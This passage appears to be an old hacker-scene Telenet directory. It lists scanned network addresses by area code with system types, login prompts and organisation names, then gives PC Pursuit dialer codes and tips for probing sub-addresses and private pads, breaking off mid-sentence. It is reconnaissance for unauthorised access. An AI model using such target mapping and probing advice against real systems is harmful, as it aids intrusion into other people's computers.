505--NEW MEXICO--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 30 AOS
$ 31 ID
$ 33 AOS
* 34
$ 36 AOS
$ 40 AOS
* 45
$ 46 AOS
$ 51 AOS
$ 52 AOS
$ 53 AOS
$ 56 AOS
$ 57 AOS
$ 60 ICN Username:
$ 61 Los Alamos
$ 70 AOS
$ 72 AOS
$ 74 AOS
$ 75 AOS
$ 77 AOS
$ 78 AOS
$ 132 AOS
$ 133 AOS
* 134
$ 136 AOS
$ 137 AOS
$ 139 AOS
$ 144
$ 150

509--WASHINGTON--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 25 AOS
$ 26 AOS
$ 31 AOS
$ 32 ID
* 33
$ 48 AOS
$ 50 AOS
$ 73 AOS
$ 79 AOS
* 130
* 140
* 145

511--UNKNOWN--ADDRESSES SCANNED: 0-250

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
87

512--TEXAS--ADDRESSES SCANNED: 0-300

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 5
$ 33 PRIME BROWNS
$ 34 PRIME AUSTIN
40
* 55
* 62
* 63
* 64
* 65
136
* 139
142 VAX Gould Inc.
$ 242 Primefax Info Service

513--OHIO--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
30 LEXIS/NEXIS
31 Meadnet
* 32
$ 33 PRIME D01
$ 34 VAX
$ 37 PRIME E03
$ 55 PRIME I01
$ 57 PRIME E04
59 Develnet
$ 65 VAX
* 66
$ 67 PRIME E09
$ 68 PRIME X01
* 69
$ 72 PRIME O1
* 73
$ 74 PRIME W01
* 75
$ 77 PRIME M01
$ 78 PRIME A02
$ 79 PRIME C2
$ 80 JETNET EVENDALE
131 LEXIS/NEXIS
132 "
133 "
134 "
* 140
143 VAX
* 144
* 158

515--IOWA--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
30 LEXIS/NEXIS
31 "
$ 39 PRIME NVSL
$ 40 ID
* 41
* 42
$ 43 PRIME DESMOM
131 LEXIS/NEXIS

516--NEW YORK--ADDRESSES SCANNED: 0-700

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
30 VAX OFFICE
35 CCI MULTILINK
* 38
$ 41 VAX
45 VM/370
47
48a Customer id:
49a "
50a "
* 140
$ 141 # CONNECT REQUESTED
157
$ 232 HP-3000
600 PRIME
* 601
610 PRIME P550
617 Pi-Net
618 Pi-Net
625 VAX
655

517--MICHIGAN--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
* 40
$ 42 AOS

518--NEW YORK--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
30 USSMSG2
31 "
35 "
36 "
37 "

601--MISSISSIPPI--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 30 AOS
$ 31 ID
$ 33 PRIME GLFPRT
* 36
* 37
* 40

602--ARIZONA--ADDRESSES SCANNED: 0-1000

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 22 PC Pursuit Dialer (300)
$ 23 PC Pursuit Dialer (1200)
$ 26 PC Pursuit Dialer (2400)
* 30
* 32
$ 33 AOS
$ 34 AOS
$ 35 GTE COMMUNICATION SYSTEMS
$ 53a CYBER
* 55
$ 56 AOS
$ 57 AOS
$ 58 AOS
$ 61 AOS
$ 62 ID
$ 65 AOS
* 66
$ 67 AOS
$ 100 AOS
* 131
* 133
141a
142
$ 242 AOS
$ 344 VAX BUSTOP
* 349
* 350
* 351
* 352
* 353
* 354
* 355
* 356
* 357
* 358
* 359
* 360
* 361
603
$ 630 >

603--NEW HAMPSHIRE--ADDRESSES SCANNED: 0-700

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 20 Dartmouth College
$ 30 AOS
* 33
$ 36 ID
$ 37
$ 40
46 USER NUMBER--
51 CHUBBS online
53 CHUBBS online
$ 57 ID
* 58
66 USER NUMBER--
135 VM/370
136 VM/370
* 137
603 VAX

606--KENTUCKY--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 30 AOS
$ 31 ID
$ 37 AOS
44 HP-3000

607--NEW YORK--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
* 30
* 32
44 enter system id
45 "
70 PRIME FDC99
* 131
* 136

608--WISCONSIN--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 30 AOS
35 enter logon command
$ 140 ID
* 141

609--NEW JERSEY--ADDRESSES SCANNED: 0-300

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 23 enter class
$ 26 UNSUPPORTED FUNCTION
42 Dow Jones
46 Dow Jones
$ 47 HP-3000
$ 61 UC
$ 63 UC
$ 68 UC
$ 73
100 PRIME
124
$ 125 HP-3000
$ 126 UC
$ 132 PRIME MOORES
$ 136 Twain Terminal Server
138 PRIME HCIONE
$ 141 UNSUPPORTED FUNCTION
$ 145 ID
170 PRIME
* 171
$ 172 UC
232a MHP2021 APPLICATION:
242 Dow Jones
243 Dow Jones
244 Dow Jones

611--UNKNOWN--ADDRESSES SCANNED: 0-400

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
25 TRANSEND
26 "
27 "
28 "
39 CCF Development System
56 CCF Computing Facility
60 Nexnet
120 VAX
130 TOPS-20 F.A.S.T.
145 Good Evening,Please Logon:
150 PRIME MHT850
192 PRIME
193 PRIME
194 PRIME
195 PRIME
196 PRIME LDN
198 PRIME DEV2
234
235 MHCOMET
236 "
237 "
238 "

612--MINNESOTA--ADDRESSES SCANNED: 0-500

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
21a
$ 22 PC Pursuit Dialer (2400)
23 WESTLAW
$ 33 ID
34 WESTLAW
36
37 WESTLAW
$ 44 AOS
$ 46 CDCNET
$ 52 PRIME
* 53
56 WESTLAW
57 "
$ 69 ID
$ 70 AOS
* 71
$ 120 PC Pursuit Dialer (300)
$ 121 PC Pursuit Dialer (1200)
$ 131 ID
* 132
* 138
$ 139 VAX
$ 162 PRIME PIERRE
* 231
* 232
* 233 AOS
236
240 MSC X.25 Gateway
* 251
* 252
$ 260 CDCNET
270 WESTLAW
271 "
* 332
* 333
$ 340 AOS
$ 351 AOS
356 WESTLAW
357 "
358 "
359 "
362 "
363 "
364 "
365 "
366 "
367 "
369 "
385
391 WESTLAW
393 "
* 430
442 please LOGIN

614--OHIO--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 30 ID
* 36
* 130
$ 131 AOS
* 132

615--TENNESSEE--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 30 AOS
$ 31 ID
$ 32
$ 33 PRIME FRKFRT
$ 34 AOS
* 36
* 50
* 55
139a Telenet Async to 3270

616--MICHIGAN--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 30 AOS
45 VAX ACTEST
$ 50
$ 51
58 MHP201A
63 Meridian

617--MASSACHUSETTS--ADDRESSES SCANNED: 0-1100

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
20 PRIME PBN27
22 PRIME BDSD
* 26
* 29
$ 30 GS/1
37 PRIME BDSH
46 PRIME BDSS
$ 47 ENTER ACCESS PASSWORD:
48 VAX
* 51
$ 56
* 61a
$ 64 PRIME OPS
67 PRIME IRI System 1
72 PRIME IRI System 2
74 PRIME ENB
* 78
* 114
* 115
143 IDC/370
147 HP-3000
152 ENTER LOGON
* 153
158 PRIME BDSW
164
169
201
205 AOS MONARCH
206
226 VM/370
* 230
236 VAX Thompson Financial Network
237 UNIX b1cs4
249 Decserver
250 NDNA
255 PRIME PBN43
256 MGS Teaching Program
* 266
270 VAX SNOOPY
273 enter system id
* 274
291
$ 311 PC Pursuit Dialer (300)
$ 313 PC Pursuit Dialer (1200)
330 VAX
* 336
$ 341 VAX
$ 347 HP-3000
349
350 PRIME PBN39
351 PRIME BDSU
352 PRIME OASB
354 VAX Anchor Comm. Router
359 VAX HEWEY
* 371
* 372
379 $$ 4200 MODEL:
380 PRIME L01
381 PRIME P01
382 PRIME Y01
383 PRIME H02
387 PRIME B01
388 $$ 4200 MODEL:
391 PRIME P01
393 PRIME Y04
398 PRIME V03
437 HP-3000
443 IDC/370
446 PRIME ENO
447 PRIME ENL
451
452 PRIME NET
454 PRIME NORTON
457 PRIME NNEB
476 PRIME NNEB
* 460
* 465
491 PRIME ROCH
492 PRIME MELVLE
493 PRIME STMFRD
499 PRIME SYRA
501 PRIME OASC
502 PRIME APPLE
510 PRIME EN.C06
515 UNIX
516 PRIME PBN38
517 PRIME PBN38
518 PRIME BDSA
519 PRIME PBN54
520 PRIME PBN57
525 PRIME IRI System 8
530 Maxlink
541 PRIME BDSS
543 PRIME PBN37
550 PRIME B01
551 PRIME CSP-A
553 PRIME BDSQ
556 PRIME
558 PRIME CSSS.A
560 PRIME BDSN
562 PRIME BDS2
563 PRIME
568 PRIME OASI
575 PRIME PBN50
577 PRIME B30
578 PRIME B04
583 PRIME MD.HFD
587 PRIME TR.SCH
* 588
$ 589
* 590
591 PRIME EN.M19
593 PRIME BDSO
596 PRIME MKT
597 PRIME BDSB
599 PRIME OASJ
618 UNIX
* 623
641 AOS Timeplace Inc.
649 PAPERCHASE
654 PRIME IRI System 9
710 PRIME MD.ATC
711 PRIME AESE01
713 PRIME PEACH
716 PRIME WAYNE
717 PRIME ETHEL
718 PRIME BUGS
722 PRIME PBN31
723 PRIME MD.NJ
724 PRIME NYMCS
725 PRIME PRNCTN
726 PRIME NJCENT
736 VAX Butterworths
737 VAX "
$ 840 PRIME WALTHM
850 PRIME MD-CHI
851 PRIME PBN30
852 PRIME MD.LP1
855 PRIME TRNG.C
856 PRIME CS.CHI
857 PRIME CS.OAK
858 PRIME CS-DEN
859 PRIME AWCE02
861 PRIME PTCDET
862 PRIME DRBN1
864 PRIME CS.DET
865 PRIME MD.DET
866 PRIME MD.DAC
867 PRIME ACEC01
868 PRIME MD.GR
870 PRIME CS.IND
871 PRIME MD.IND
872 PRIME MD.PIT
873 PRIME ACMC01
874 PRIME PITTCS
875 PRIME MD.CLE
902 PRIME MD.HOU
905 PRIME OASG
908 PRIME WMCS
910 PRIME CSWDC
911 PRIME VIENNA
912 PRIME BALT
928 PRIME CS.HOU
930 PRIME MD.AUS
931 PRIME CS.SCR
937 PRIME TRNED
957 PRIME ZULE
958 PRIME EDOC1
959 PRIME FUZZY
962 PRIME PBN49
* 971
* 972
* 973
* 974
980 PRIME WUFPAK
981 PRIME WMMKT
986
993 CU-Manchester-
995 PRIME ATC55
996 PRIME PBN65
998 PRIME TRNGB
3088 VAX DELPHI

619--CALIFORNIA--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 31 Environment Ctrl Monitor
41 VM/370
* 51
56
57
$ 62 AOS
$ 63 AOS

626--UNKNOWN--ADDRESSES SCANNED: VARIOUS

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 1000 PRIME
$ 1002 VAX Pacific Gas & Electric

703--VIRGINIA--ADDRESSES SCANNED: 0-1300

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 30 AOS
$ 32
$ 33 AOS
40 VAX
41 VAX
$ 42 ENTER USERID:
44 AOS Project HOPE
$ 53 HP-3000
55 ENTER SWITCH CHARS
141 enter /login
142 "
160 VAX
163a
$ 168
* 176
$ 177 AOS
* 206
* 207
$ 253 AOS
$ 254 AOS
$ 255 AOS
$ 256 AOS
$ 257 AOS
$ 262 AOS
* 340
* 341
* 342
$ 344 ** NETWORK SIGN-ON FAILED:
* 346
367 P.R.C.
371 P.R.C.
* 377
431 TACL 1>
* 460
* 461
$ 463 DEC-20
* 464
$ 466 DEC-20
* 467
$ 468
$ 469 Decserver
* 470
511 bcs network
512 bcs network
530 bcs network
$ 1000 FCC FIRSTRA'
$ 1001 FCC FIRSTRA'

704--NORTH CAROLINA--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 31 AOS
$ 32 AOS
* 60
* 61
* 62
$ 63 AOS
* 64
* 168
170
171
173

707--CALIFORNIA--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 30 AOS
$ 48 AOS
$ 49 AOS
$ 50 AOS
$ 51 AOS
$ 52 AOS

711--UNKNOWN--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
15 PRIME

713--TEXAS--ADDRESSES SCANNED: 0-500

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 24 PC Pursuit Dialer (2400)
* 42
$ 43 ID
$ 44 ID
* 58
73 PRIME TXNODE
76 %u@IUeASID@cAbR@CUDEz
77 "
79 "
80 "
81 "
$ 113 PC Pursuit Dialer (300)
$ 114 PC Pursuit Dialer (1200)
146 %u@IUeASID@cAbR@CUDEz
* 167
* 224
* 227
* 228
* 232
* 234
$ 238 HP-3000
239 Compaq
255 PRIME SYS1
$ 260 PRIME HOUSTN
276
* 335
336 PRIME GANODE
340a
345 COMM520
346a Telenet Async to 3270
$ 364 VAX
366 PRIME CANODE
368 PRIME MANODE
$ 371 Coca-Cola Foods
431

714--CALIFORNIA--ADDRESSES SCANNED: 0-300

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 4 PC Pursuit Dialer (2400)
$ 23 PC Pursuit Dialer (300)
$ 24 PC Pursuit Dialer (1200)
$ 33 911 Monitor ECM
$ 41 AGS
48 PRIME TWCALF
49 SERVICE ID=
$ 55 HP-3000
$ 62 AOS
$ 63 AOS
$ 64 AOS
$ 65 AOS
$ 66 AOS
$ 67 AOS
$ 68 AOS
72 PRIME FSCOPE
$ 102 PC Pursuit Dialer (2400)
$ 119 PC Pursuit Dialer (300)
$ 121 PC Pursuit Dialer (1200)
$ 130 MMSA
131 PRIME CAJH
* 133
* 145
$ 160 HP-3000
* 164
166 HP-3000
* 167
* 168
* 169
171 COMMAND UNRECOGNIZED
172 "
* 178
$ 210 PC Pursuit Dialer (300)
$ 213 PC Pursuit Dialer (1200)
$ 240 AOS
246 COMMAND UNRECOGNIZED
$ 272 AOS
* 273
$ 274 AOS
$ 275 AOS
$ 276 AOS

716--NEW YORK--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
23 enter user code please
25 "
31 HP-3000
50
130 enter logon request-
131 "
133 "
$ 135 VAX

717--PENNSYLVANIA--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
8 VM/370
* 24
* 31
* 32
* 33
* 34
40 PRIME IREX
42 PRIME IREX
45 VOS
46 VOS
47 Camp Hill Mgt. Info Center
48 "
50
51 Telenet Async to 3270
52a Telenet Async to 3270
53
* 150
* 153
* 154
* 160
* 161
* 162
* 163

801--UTAH--ADDRESSES SCANNED: 0-500

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 12 PC Pursuit Dialer (2400)
$ 20 PC Pursuit Dialer (300)
$ 21 PC Pursuit Dialer (1200)
24 Wasatch System
25 "
26 "
27 "
$ 35 ID
* 37
$ 39 AOS
$ 44 AOS
$ 49 AOS
$ 52 AOS
$ 54 VAX
$ 57 AOS
$ 60 AOS
$ 62 AOS
$ 65 AOS
$ 130 AOS
144
* 150
$ 151 AOS
* 152
$ 153 AOS
176
$ 231 AOS
$ 232 AOS
$ 239 AOS
250 ID?>
257
258

802--VERMONT--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 31 AOS
$ 32 AOS
$ 33 ID
* 35
* 36
$ 37 AOS
$ 38 AOS

803--SOUTH CAROLINA--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
* 30
* 32
$ 50
$ 51 KEMET ELECTRONICS
* 55
60 Telenet Async to 3270
61a Telenet Async to 3270
$ 70 AOS
* 71
* 74
$ 77 AOS
131 Kemet
132a Telenet Async to 3270
* 133
$ 135 PRIME PRISM

804--VIRGINIA--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
35 VAX
* 43
* 45
$ 60 ID
* 61
* 62
* 155
$ 160 AOS

805--CALIFORNIA--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 30 AOS
50 VAX
51 VAX
* 58
* 59
* 60
* 61
* 62
* 63
* 64
* 65
* 74
90
100
101 UNIX salt.acc.com
130
150 PRIME MBM

808--HAWAII--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 40 VAX
100 PRIME

811--GTE--ADDRESSES SCANNED: 0-300

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
* 15
17 HP-3000
21 UNIX GTE RPU2
22 UNIX GTE IPU
24 UNIX GTE RPU1
25 TACL 1>
28 TACL 1>
118 CANNOT EXEC!
123 HP-3000
* 129
* 143
* 217
* 219

812--INDIANA--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 30 AOS

813--FLORIDA--ADDRESSES SCANNED: 0-700

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 20 PC Pursuit Dialer (300)
$ 21 PC Pursuit Dialer (1200)
* 33
35 PRIME S9750
43 ** 4200 TERMINAL TYPE:
$ 52 DEC-20 Price Waterhouse
$ 53 VAX
$ 55 PRICE WATERHOUSE
$ 59 Telenet Async to 3270
73 VM/370
74 ** 4200 TERMINAL TYPE:
* 76
$ 124 PC Pursuit Dialer (2400)
131 IBM INFORMATION SERVICES
143 "
147 "
* 148
* 151
* 153
* 154
160 VAX
161 VAX
164 VAX
* 165
166a Telenet Async to 3270
* 167
$ 169 GS/1
172 IBM INFORMATION SERVICES
174 "
210
214
215
218
* 222
$ 225 ----SECURITY SUBSYSTEM----
$ 226 "
* 265
267 IBM INFORMATION SERVICES
$ 268 U#=
269a VAX Addidas
271 Access Code:
272 PRIME
275 Access Code:
277 U#=
* 330
344 TACL 1>
346 "
350 VAX
* 351
355
* 360
* 361
430 Telenet Async to 3270
431a Telenet Async to 3270
436 U#=
438 VAX DEC/ETONIC
* 460
465 Martin Marietta
466 Martin Marietta
467 Enter Switch Characters
468 "
660

814--PENNSYLVANIA--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
50 PRIME SYSA
* 53
$ 130 VAX
$ 137 AOS

816--MISSOURI--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
36
* 38
* 43
$ 44 AOS
* 45
$ 57 AOS
$ 58 AOS
* 59
$ 62
77
$ 104 PC Pursuit Dialer (300)
$ 113 PC Pursuit Dialer (1200)
$ 150
* 157
* 161
189 CDCNET

817--TEXAS--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
* 33
$ 35 PRIME FWRTH
* 36
* 37
141 VAX Tandy Information Service
* 160
* 161
* 162

818--CALIFORNIA--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
* 20
$ 21 PC Pursuit Dialer (1200)
* 29
* 50
$ 130
* 139

888--GTE HAWAIIAN TELEPHONE--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
* 25
$ 51
* 52
$ 53 PRIME HAWAII
* 30
* 45
* 50

890--UNKNOWN--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 100 ADTN USER ID
$ 102 "
$ 103 "
$ 109 GS/1
$ 110 ADTN USER ID
$ 125 "
$ 126 "
$ 129 "

901--TENNESSEE--ADDRESSES SCANNED: 0-300

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
* 30
* 134

904--FLORIDA--ADDRESSES SCANNED: 0-400

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 34 AOS
$ 41 AOS
$ 45 AOS
$ 50 AOS
51 COMMAND UNRECOGNIZED
52 COMMAND UNRECOGNIZED
53 COMMAND UNRECOGNIZED
$ 55 AOS
$ 56 AOS
$ 58 ID
* 60
141
* 160
* 161
232
* 235

907--ALASKA--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 31 ID
* 32
$ 33 AOS
* 34
$ 35 AOS
$ 44
$ 45 AOS
* 46
$ 47 AOS
$ 48 AOS
* 50
* 51
$ 130 AOS
138

909--TELENET--ADDRESSES SCANNED: 0-1000

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 3 Telenet Port
8 PRIME
9 PRIME
10 PRIME
12 PRIME
13
14 Telenet Port
23 PRIME
26 PRIME
27 PRIME
38 PRIME
39 USER ID
44 PRIME
52
53 PRIME
54
56 PRIME
60 PRIME
61 PRIME
62 PRIME
63 PRIME
65 PRIME
73 PRIME
77 PRIME
78 PRIME
79 MHP201A
90 PRIME
92 PRIME
94 PRIME
95 PRIME
97 PRIME
98 PRIME
100 PRIME
101 USER ID
102 USER ID
104
117 PRIME
123 PRIME
130 PRIME
131 PRIME
136 PRIME
137 PRIME
139 PRIME
141 PRIME
143 PRIME
144 PRIME
146 PRIME Telemail
147 PRIME "
148 PRIME "
149 PRIME "
151
153 TACL 1>
154 "
155 PRIME Telemail
158 PRIME "
159 PRIME "
160 PRIME "
161 PRIME "
162 PRIME
165 PRIME Telemail
168 PRIME "
* 170
171
172
173 PRIME
176 PRIME
178 USER ID
179 "
184 "
187
197
198
205 PRIME
206 PRIME
235 PRIME
236 PRIME
239 PRIME
$ 312 !Load and Function Tester
$ 314 "
316 "
$ 317 "
318 "
319 "
325
328 !Load and Function Tester
330 FRAME TESTER?
338 !Load and Function Tester
400 PRIME Telemail
401 PRIME "
403 PRIME "
404 PRIME "
406 PRIME "
407 PRIME
408 PRIME
409 PRIME
508 PRIME
600 VAX
615 PRIME
622 PRIME
623 PRIME
624 PRIME
626 PRIME
627 PRIME
628 PRIME
629 PRIME
630 PRIME
631 PC Pursuit BBS
632
633
634
635
643 PRIME
646
650 PRIME
651 PRIME
656
657
658
659
660
661
663
664
675 PRIME
676 PRIME
677 PRIME
678 PRIME
679 PRIME
680 PRIME
686 Telenet FE BBS1
747
751 TELENET MUS/XA NETWORK
761 PRIME Telemail
762 PRIME
763 PRIME
764 Telenet Async to 3270
767 TELENET NUS/XA NETWORK
770 PRIME
772 PRIME
773 PRIME
777 Telenet Async to 3270
779 "
781 "
782 "
784 "
798 PRIME
799 PRIME
800 PRIME
801 PRIME
805 PRIME
810 PRIME
811 PRIME
815 PRIME
816 PRIME
817 PRIME
818 PRIME
819 PRIME
822 PRIME
823 PRIME
824 PRIME
825 PRIME
826 PRIME
827 PRIME
828 PRIME
830 PRIME
831 PRIME
832 PRIME
833 PRIME
834 PRIME
840 PRIME Telemail
841 PRIME "
842 PRIME "
843 PRIME "
844 PRIME "
845 PRIME "
846
847
848 PRIME Telemail
893 PRIME
894 PRIME
900 PRIME
901 PRIME
902 PRIME
911 PRIME
912 PRIME

910--TELENET--ADDRESSES SCANNED: VARIOUS

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
100 PRIME
200 PRIME
300 PRIME
400 PRIME
500 PRIME

912--GEORGIA--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
30
* 31

913--KANSAS--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 32 ID
* 34
$ 150 PRIME TOPEKA

914--NEW YORK--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 32 VM/370
33 VM/370
34 >>
35 >>
* 38
$ 41 VM/370 Pepsi
* 42
50 Mnematics
133
* 160

916--CALIFORNIA--ADDRESSES SCANNED: 0-700

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 7 PC Pursuit Dialer (2400)
$ 11 PC Pursuit Dialer (300)
$ 12 PC Pursuit Dialer (1200)
$ 30 AOS
$ 33 AOS
$ 34 PRIME SACRA
$ 36 ID
$ 39 AOS
$ 40 AOS
$ 41 ID
55 PRIME FIMSAC
$ 56 AOS
$ 57 AOS
$ 58 AOS
$ 59 AOS
$ 63 AOS
$ 64 AOS
$ 130 AOS
$ 131 AOS
$ 132 AOS
$ 133 AOS
$ 134 AOS
$ 141 AOS
$ 168 AOS
* 169
* 171
$ 232 AOS
$ 233 AOS
* 234
$ 235 AOS
$ 236 AOS
240
268 Telenet Async to 3270
* 330
* 331
* 332
* 333
* 334
* 335
* 336
* 337
* 338
* 339
350
* 360
* 361
* 362
* 363
* 364
* 365
* 366
* 367
* 368
* 369
$ 530
* 531
607 UNIX IPA State Net
608 UNIX IPA State Net

918--OKLAHOMA--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 30 ID
40 CUSTOMER ID:
105 American Airlines
130 American Airlines

919--NORTH CAROLINA--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 20 PC Pursuit Dialer (300)
$ 21 PC Pursuit Dialer (1200)
$ 33 ID
$ 34 AOS
* 36
* 38
43 enter system id
44 "
46 "
47 VM/370 Northern Telcom
* 58
$ 59 AOS
* 60
$ 70 HP-3000
$ 124 PC Pursuit Dialer (2400)
$ 130 HP-3000
135 USA TODAY Sports Center
* 139
$ 145
* 158
* 159

MNEMONIC ADDRESSES
------------------

$ AFS
APPLE
BCS
BIONET
BLUE
BRS
CCC03
CMS
$ COM
D30
D31
D32
D33
D34
D35
D36
D37
D41
D42
D43
D44
D45
D46
D50
D51
D52
D53
D54
D55
D56
D57
D58
D61
D62
D63
D64
DELPHI
DOW
DUNS
EIES
GOLD
GTEM
HHTRAN
INFO
IRIS
MMM
MUNI
NASA
NET
NSF
OAG
OLS
ORBIT
PORTAL
PRIME
S10
S11
S12
S13
S14
S15
S16
S17
S18
S19
SIS
SIT
SPR
STK1
STK2
STK3
STK4
SUMEX
USIBM
USPS
VUTEXT

PC-PERSUIT DIALERS
------------------

C D/CITY/BAUD,ID,PASSWORD

A/C CITY
--- -----
201 NJNEW
202 DCWAS
203 CTHAR
206 WASEA
212 NYNYO
213 CALAN
214 TXDAL
215 PAPHI
216 OHCLV
303 CODEN
305 FLMIA
312 ILCHI
313 MIDET
314 MOSLO
404 GAATL
408 CASJO
414 WIMIL
415 CAPAL
415 CASFA
503 ORPOR
602 AZPHO
612 MNMIN
617 MABOS
619 CASAD
713 TXHOU
714 CARIV
714 CASAN
801 UTSLC
813 FLTAM
816 MOKAN
818 CAGLE
916 CASAC
919 NCRTP

TELENET SCANNING TIPS
--------------------

There are a few things to take into consideration when using Telenet.
First of all, ignore error messages! When something says rejecting, or
illegal address, or remote procedure error, try it again using sub-
addresses. (IE: 100100a, 100100b...100100.99) I have also found that
some addresses that are rejecting merely require that you connect to it
using an id. Many of the things that respond with illegal address are
telenet pads. Most of the public pads are in the following ranges: 0-20,
80-100, 180-190. Many times you will find private pads. If you are very,
very lucky you will find that pad-to-pad connections are possible to these
privately owned pads. However, most of the time they are not operating, so
your chances of actually picking anything up are very slim.

When I did this directory I only checked the first few sub addresses on
addresses that didn't immediately connect, so needless to say there are
still a vast amount of systems out there. One address I have responds with
